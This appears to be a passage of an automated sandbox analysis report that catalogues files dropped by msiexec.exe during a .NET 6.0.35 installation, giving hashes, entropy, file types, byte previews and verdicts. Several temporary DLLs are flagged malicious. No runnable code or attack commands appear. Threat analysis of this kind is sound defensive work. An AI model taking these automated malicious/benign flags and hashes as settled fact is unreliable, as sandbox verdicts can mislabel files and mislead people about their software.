                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Microsoft .NET Host FX Resolver - 6.0.35 (x64), Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft .NET Host FX Resolver - 6.0.35 (x64)., Template: x64;1033, Revision Number: {4E46258D-E612-40D6-A98B-8F64771E3561}, Create Time/Date: Fri Sep 20 22:45:38 2024, Last Saved Time/Date: Fri Sep 20 22:45:38 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):876544
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.764930942879866
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:2F1vYgTqU8VKIvZUlkj/cBhZeK4lu/XdmYw:Q/THWvZgkjcDefMFm
                                                                                                                                                                                                                                                                                                                                  MD5:D8BEAFDEDBD946A6A8FC665AF000ED79
                                                                                                                                                                                                                                                                                                                                  SHA1:2BFE61EADB6172CB71CEA0155A7304630B28B13E
                                                                                                                                                                                                                                                                                                                                  SHA-256:671E5EF4766CAC4AA479E7445F52892D1807F63269BDA8159A584C540FB56706
                                                                                                                                                                                                                                                                                                                                  SHA-512:2774D5A5158BCE463819DBC2DDC065DA502A1C6C75A800A815BEEB028C95000263F42B6E6012FC979A3A5AC51B9027B231685739F7A0D7043178762B1602A9B0
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\44c519.msi

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Microsoft .NET Host FX Resolver - 6.0.35 (x64), Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft .NET Host FX Resolver - 6.0.35 (x64)., Template: x64;1033, Revision Number: {4E46258D-E612-40D6-A98B-8F64771E3561}, Create Time/Date: Fri Sep 20 22:45:38 2024, Last Saved Time/Date: Fri Sep 20 22:45:38 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):876544
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.764930942879866
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:2F1vYgTqU8VKIvZUlkj/cBhZeK4lu/XdmYw:Q/THWvZgkjcDefMFm
                                                                                                                                                                                                                                                                                                                                  MD5:D8BEAFDEDBD946A6A8FC665AF000ED79
                                                                                                                                                                                                                                                                                                                                  SHA1:2BFE61EADB6172CB71CEA0155A7304630B28B13E
                                                                                                                                                                                                                                                                                                                                  SHA-256:671E5EF4766CAC4AA479E7445F52892D1807F63269BDA8159A584C540FB56706
                                                                                                                                                                                                                                                                                                                                  SHA-512:2774D5A5158BCE463819DBC2DDC065DA502A1C6C75A800A815BEEB028C95000263F42B6E6012FC979A3A5AC51B9027B231685739F7A0D7043178762B1602A9B0
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\44c51a.msi

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Microsoft .NET Host - 6.0.35 (x64), Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft .NET Host - 6.0.35 (x64)., Template: x64;1033, Revision Number: {C44636B0-CF91-423F-8EBB-E5C6C9CC18A4}, Create Time/Date: Fri Sep 20 22:45:28 2024, Last Saved Time/Date: Fri Sep 20 22:45:28 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):811008
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.575095120429218
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:4gJcuBRFvqU8VKIvZUlkj/cBhZeK4lu/XdmYwh:46zBRlHWvZgkjcDefMFm
                                                                                                                                                                                                                                                                                                                                  MD5:C06D2181660306AE33B8D5E37DD4E98D
                                                                                                                                                                                                                                                                                                                                  SHA1:2B7F6A21BDB9E2414C3B13AA357C395512A86499
                                                                                                                                                                                                                                                                                                                                  SHA-256:D09C105D0C6E5D89D4E53499288135FF53AAAC76EE1E11470EC1AE49CC4A485E
                                                                                                                                                                                                                                                                                                                                  SHA-512:96205082A1C94370D7D4DA90C319A0D0E3AF8FB53B2A33097C86A0D8EC14963745A940E38FB31B68394847AA80467E41CA1B5F83685F25B779521676DBA1EA4C
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\44c51d.msi

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Microsoft .NET Host - 6.0.35 (x64), Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft .NET Host - 6.0.35 (x64)., Template: x64;1033, Revision Number: {C44636B0-CF91-423F-8EBB-E5C6C9CC18A4}, Create Time/Date: Fri Sep 20 22:45:28 2024, Last Saved Time/Date: Fri Sep 20 22:45:28 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):811008
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.575095120429218
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:4gJcuBRFvqU8VKIvZUlkj/cBhZeK4lu/XdmYwh:46zBRlHWvZgkjcDefMFm
                                                                                                                                                                                                                                                                                                                                  MD5:C06D2181660306AE33B8D5E37DD4E98D
                                                                                                                                                                                                                                                                                                                                  SHA1:2B7F6A21BDB9E2414C3B13AA357C395512A86499
                                                                                                                                                                                                                                                                                                                                  SHA-256:D09C105D0C6E5D89D4E53499288135FF53AAAC76EE1E11470EC1AE49CC4A485E
                                                                                                                                                                                                                                                                                                                                  SHA-512:96205082A1C94370D7D4DA90C319A0D0E3AF8FB53B2A33097C86A0D8EC14963745A940E38FB31B68394847AA80467E41CA1B5F83685F25B779521676DBA1EA4C
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\MSI12F6.tmp

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):4718641
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.577367326443097
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:98304:k3H5BNwueVRfshljU+cCD+EA2IvtynSyeGPCXtoa3yRHbXLjtQ:k3H5BNMshFUi+sng/oaO7y
                                                                                                                                                                                                                                                                                                                                  MD5:25A0AA722268B17888B4E159A9F82F18
                                                                                                                                                                                                                                                                                                                                  SHA1:68CCB5ADAE9095056A9D5592F6A850F30715A86B
                                                                                                                                                                                                                                                                                                                                  SHA-256:72896D8ABEEEB40360596927C0FEADE8F0BC28F9937D35F646B9BA2A47F1EDCA
                                                                                                                                                                                                                                                                                                                                  SHA-512:79A574F95DBB5FF11E35F2938FCD6A9E22A3F1A35D7E032ACEB099DD69AD45DCDF006D92AEB7D1086E3D0615241F6669E510D5DEE6F7D262E0E3D4179822365D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........h.[...[...[....;..R....:..C....;..Z....:.......:..........\.......Z......^.......L...[........;..#....;..Z....;..Z...[...Z....;..Z...Rich[...........PE..L....;.d...........!.....l...........[....................................................@.............................g;...a.......p.......................P...7......8............................ ..@...............H...H\.......................text...2f.......h.................. ..`.orpc... ............l.............. ..`.rdata..w3.......4...p..............@..@.data...............................@....rsrc........p......................@..@.reloc..f(...P...*...r..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\MSI172D.tmp

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):4718641
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.577367326443097
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:98304:k3H5BNwueVRfshljU+cCD+EA2IvtynSyeGPCXtoa3yRHbXLjtQ:k3H5BNMshFUi+sng/oaO7y
                                                                                                                                                                                                                                                                                                                                  MD5:25A0AA722268B17888B4E159A9F82F18
                                                                                                                                                                                                                                                                                                                                  SHA1:68CCB5ADAE9095056A9D5592F6A850F30715A86B
                                                                                                                                                                                                                                                                                                                                  SHA-256:72896D8ABEEEB40360596927C0FEADE8F0BC28F9937D35F646B9BA2A47F1EDCA
                                                                                                                                                                                                                                                                                                                                  SHA-512:79A574F95DBB5FF11E35F2938FCD6A9E22A3F1A35D7E032ACEB099DD69AD45DCDF006D92AEB7D1086E3D0615241F6669E510D5DEE6F7D262E0E3D4179822365D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........h.[...[...[....;..R....:..C....;..Z....:.......:..........\.......Z......^.......L...[........;..#....;..Z....;..Z...[...Z....;..Z...Rich[...........PE..L....;.d...........!.....l...........[....................................................@.............................g;...a.......p.......................P...7......8............................ ..@...............H...H\.......................text...2f.......h.................. ..`.orpc... ............l.............. ..`.rdata..w3.......4...p..............@..@.data...............................@....rsrc........p......................@..@.reloc..f(...P...*...r..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\MSI1DD5.tmp

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):182768
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.29474871459677
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:M3hCcV2YVWR8xSSIqeCjEIz+hZvgvE5Q+yq8MPdJ0xH:ErTz9Pj/Ag/+XPw
                                                                                                                                                                                                                                                                                                                                  MD5:9ED1749276D20BE78D5E7A30D658C484
                                                                                                                                                                                                                                                                                                                                  SHA1:EAAEA2656A63366A888955CE030E091FEA70F0F6
                                                                                                                                                                                                                                                                                                                                  SHA-256:61F398C652504FEE07AF12AC50D4A70ECFF641234A4EDA59C68EC937B6D80C96
                                                                                                                                                                                                                                                                                                                                  SHA-512:33ACF0BDBD1F33526D348A47BC00963843FC72EB203DF07D0136110109C892FB20AA9D3147204F958B95D750F7F98EB5DF3C387ED4B8802B7F929F201B41E90F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x......................K.......................n...............nz.....K.......K.......K.........T.....K.......Rich....................PE..L....7.d...........!.................................................................I....@..........................E..a....6..........p................-......t...................................h...@............................................text............................... ..`.rdata..............................@..@.data...41...P.......:..............@....rsrc...p............L..............@..@.reloc...H.......J...R..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\MSI3352.tmp

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):250736
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.765155684437659
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:hXiqyhTO8W0iEa8LW0bEC9hvZpC01v+eUKflQnZl+T+J7g6EsNr7wyy/EPzr9XA:hqhy8VKU3hvZUy+ppHEsuB/cBQ
                                                                                                                                                                                                                                                                                                                                  MD5:60E8C139E673B9EB49DC83718278BC88
                                                                                                                                                                                                                                                                                                                                  SHA1:00A3A9CD6D3A9F52628EA09C2E645FE56EE7CD56
                                                                                                                                                                                                                                                                                                                                  SHA-256:B181B6B4D69A53143A97A306919BA1ADBC0B036A48B6D1D41AE7A01E8EF286CB
                                                                                                                                                                                                                                                                                                                                  SHA-512:AC7CB86DBF3B86F00DA7B8A246A6C7EF65A6F1C8705EA07F9B90E494B6239FB9626B55EE872A9B7F16575A60C82E767AF228B8F018D4D7B9F783EFACCCA2B103
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x.....V...V...V:i.W...V:i.WR..V.q.W...V.q.W...V.q.W...V:i.W...V:i.W...V:i.W...V...V&..Vup.W...Vup.W...VupFV...V...V...Vup.W...VRich...V................PE..L......e...........!.....<...X......Q........P...........................................@..........................G.......L..........x............|..pW...........<..T............................<..@............P..0............................text....:.......<.................. ..`.rdata.......P.......@..............@..@.data...4$...`.......N..............@....rsrc...x............X..............@..@.reloc...............^..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\MSI3C2D.tmp

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):84904
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.644708577111245
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:efsMvnDNlt3Hss+bEQjDhvBfHkuMfw9HcISmiWessgt7S2tsMv2XsP4G3IJ7k3Nw:EsMvnHN+bx3IW3u
                                                                                                                                                                                                                                                                                                                                  MD5:326FAC1B2AB33C0999FA3C2AB0C8632C
                                                                                                                                                                                                                                                                                                                                  SHA1:8F7A20FCF0D49187EF2531219D8B73B1F73021B2
                                                                                                                                                                                                                                                                                                                                  SHA-256:53206129270B378E3EE0ECA436BE23E5AFCAC949E02752C2724D63E17A422948
                                                                                                                                                                                                                                                                                                                                  SHA-512:419B7BE68AC92FEA5CD4362EBEC997E981001566E471DB70CE01714038649887630FE0BF4C0EB34005226BA77382B529F953DDF3AAFD429222AED7275354757A
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:...@IXOS.@.....@.^Y.@.....@.....@.....@.....@.....@......&.{C79F6EEC-3A2B-487D-A3B6-EDF4057B4E4B}%.Microsoft .NET Runtime - 6.0.35 (x64)!.dotnet-runtime-6.0.35-win-x64.msi.@.....@.S.0.@.....@........&.{76657AF8-AF4E-4FA9-9A39-80AC267D9B11}.....@.....@.....@.....@.......@.....@.....@.......@....%.Microsoft .NET Runtime - 6.0.35 (x64)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{BCDE6883-BAB7-54AB-B504-D8C3F75FDB2A}S.02:\Software\Classes\Installer\Dependencies\dotnet_runtime_48.140.21458_x64\Version.@.......@.....@.....@......&.{F621578B-E081-5FC4-B0C5-A151B816DC51}D.C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\.version.@.......@.....@.....@......&.{B0658A77-9697-57AB-AEF0-C49F5788A264}^.C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-console-l1-1-0.dll.@.......@.....@.....@......&.{120A93F0-81ED-50CA-84

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\MSI6457.tmp

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):250736
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.765155684437659
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:hXiqyhTO8W0iEa8LW0bEC9hvZpC01v+eUKflQnZl+T+J7g6EsNr7wyy/EPzr9XA:hqhy8VKU3hvZUy+ppHEsuB/cBQ
                                                                                                                                                                                                                                                                                                                                  MD5:60E8C139E673B9EB49DC83718278BC88
                                                                                                                                                                                                                                                                                                                                  SHA1:00A3A9CD6D3A9F52628EA09C2E645FE56EE7CD56
                                                                                                                                                                                                                                                                                                                                  SHA-256:B181B6B4D69A53143A97A306919BA1ADBC0B036A48B6D1D41AE7A01E8EF286CB
                                                                                                                                                                                                                                                                                                                                  SHA-512:AC7CB86DBF3B86F00DA7B8A246A6C7EF65A6F1C8705EA07F9B90E494B6239FB9626B55EE872A9B7F16575A60C82E767AF228B8F018D4D7B9F783EFACCCA2B103
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x.....V...V...V:i.W...V:i.WR..V.q.W...V.q.W...V.q.W...V:i.W...V:i.W...V:i.W...V...V&..Vup.W...Vup.W...VupFV...V...V...Vup.W...VRich...V................PE..L......e...........!.....<...X......Q........P...........................................@..........................G.......L..........x............|..pW...........<..T............................<..@............P..0............................text....:.......<.................. ..`.rdata.......P.......@..............@..@.data...4$...`.......N..............@....rsrc...x............X..............@..@.reloc...............^..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\MSI65BF.tmp

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):250736
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.765155684437659
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:hXiqyhTO8W0iEa8LW0bEC9hvZpC01v+eUKflQnZl+T+J7g6EsNr7wyy/EPzr9XA:hqhy8VKU3hvZUy+ppHEsuB/cBQ
                                                                                                                                                                                                                                                                                                                                  MD5:60E8C139E673B9EB49DC83718278BC88
                                                                                                                                                                                                                                                                                                                                  SHA1:00A3A9CD6D3A9F52628EA09C2E645FE56EE7CD56
                                                                                                                                                                                                                                                                                                                                  SHA-256:B181B6B4D69A53143A97A306919BA1ADBC0B036A48B6D1D41AE7A01E8EF286CB
                                                                                                                                                                                                                                                                                                                                  SHA-512:AC7CB86DBF3B86F00DA7B8A246A6C7EF65A6F1C8705EA07F9B90E494B6239FB9626B55EE872A9B7F16575A60C82E767AF228B8F018D4D7B9F783EFACCCA2B103
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x.....V...V...V:i.W...V:i.WR..V.q.W...V.q.W...V.q.W...V:i.W...V:i.W...V:i.W...V...V&..Vup.W...Vup.W...VupFV...V...V...Vup.W...VRich...V................PE..L......e...........!.....<...X......Q........P...........................................@..........................G.......L..........x............|..pW...........<..T............................<..@............P..0............................text....:.......<.................. ..`.rdata.......P.......@..............@..@.data...4$...`.......N..............@....rsrc...x............X..............@..@.reloc...............^..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\MSI663D.tmp

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2805
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.772666941498026
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:KLgodt08v2Oh0giUHMb6P3q2Ym1kPjD8SuhJB4yKeU1DPDnPZDZk3EVltibVq:KLgodtfO40YHP2YO9YJCZe6bDPZDZk3g
                                                                                                                                                                                                                                                                                                                                  MD5:BD27F8767C98DB8ECCE39A9BFB4F774F
                                                                                                                                                                                                                                                                                                                                  SHA1:B1A893973750BAC4168F12ED36090257EFC213B5
                                                                                                                                                                                                                                                                                                                                  SHA-256:7B6163293035358FB54979A95745FCDAFFF9599D73ADF592E3418D90BEAD0A7A
                                                                                                                                                                                                                                                                                                                                  SHA-512:9941E1E5DE7C5A3D13CF9659ED2B4CF39156CFB430BEFAC9BC459B172AF59EC621C870B45241C80885CDA53781633AC22246187984B80CFC073F7ECEB0FB3A84
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:...@IXOS.@.....@..^Y.@.....@.....@.....@.....@.....@......&.{E91F8AC1-4917-455E-AACA-B40B193C7A62}..Microsoft .NET Host FX Resolver - 6.0.35 (x64)!.dotnet-hostfxr-6.0.35-win-x64.msi.@.....@.S.0.@.....@........&.{4E46258D-E612-40D6-A98B-8F64771E3561}.....@.....@.....@.....@.......@.....@.....@.......@......Microsoft .NET Host FX Resolver - 6.0.35 (x64)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{E3262256-B959-50C5-91BD-D2C1656236F1}W.02:\Software\Classes\Installer\Dependencies\Dotnet_CLI_HostFxr_48.140.21458_x64\Version.@.......@.....@.....@......&.{B59DD035-01D3-57CD-A06D-224838439FEA}3.C:\Program Files\dotnet\host\fxr\6.0.35\hostfxr.dll.@.......@.....@.....@......&.{8EC524B8-7864-5ACE-B320-2D36216EBC12}?.02:\SOFTWARE\dotnet\Setup\InstalledVersions\x64\hostfxr\Version.@.......@.....@.....@........InstallFiles..Copying new files&.File: [1], Dir

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\MSI6738.tmp

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):250736
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.765155684437659
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:hXiqyhTO8W0iEa8LW0bEC9hvZpC01v+eUKflQnZl+T+J7g6EsNr7wyy/EPzr9XA:hqhy8VKU3hvZUy+ppHEsuB/cBQ
                                                                                                                                                                                                                                                                                                                                  MD5:60E8C139E673B9EB49DC83718278BC88
                                                                                                                                                                                                                                                                                                                                  SHA1:00A3A9CD6D3A9F52628EA09C2E645FE56EE7CD56
                                                                                                                                                                                                                                                                                                                                  SHA-256:B181B6B4D69A53143A97A306919BA1ADBC0B036A48B6D1D41AE7A01E8EF286CB
                                                                                                                                                                                                                                                                                                                                  SHA-512:AC7CB86DBF3B86F00DA7B8A246A6C7EF65A6F1C8705EA07F9B90E494B6239FB9626B55EE872A9B7F16575A60C82E767AF228B8F018D4D7B9F783EFACCCA2B103
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x.....V...V...V:i.W...V:i.WR..V.q.W...V.q.W...V.q.W...V:i.W...V:i.W...V:i.W...V...V&..Vup.W...Vup.W...VupFV...V...V...Vup.W...VRich...V................PE..L......e...........!.....<...X......Q........P...........................................@..........................G.......L..........x............|..pW...........<..T............................<..@............P..0............................text....:.......<.................. ..`.rdata.......P.......@..............@..@.data...4$...`.......N..............@....rsrc...x............X..............@..@.reloc...............^..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\MSI6833.tmp

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):250736
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.765155684437659
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:hXiqyhTO8W0iEa8LW0bEC9hvZpC01v+eUKflQnZl+T+J7g6EsNr7wyy/EPzr9XA:hqhy8VKU3hvZUy+ppHEsuB/cBQ
                                                                                                                                                                                                                                                                                                                                  MD5:60E8C139E673B9EB49DC83718278BC88
                                                                                                                                                                                                                                                                                                                                  SHA1:00A3A9CD6D3A9F52628EA09C2E645FE56EE7CD56
                                                                                                                                                                                                                                                                                                                                  SHA-256:B181B6B4D69A53143A97A306919BA1ADBC0B036A48B6D1D41AE7A01E8EF286CB
                                                                                                                                                                                                                                                                                                                                  SHA-512:AC7CB86DBF3B86F00DA7B8A246A6C7EF65A6F1C8705EA07F9B90E494B6239FB9626B55EE872A9B7F16575A60C82E767AF228B8F018D4D7B9F783EFACCCA2B103
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
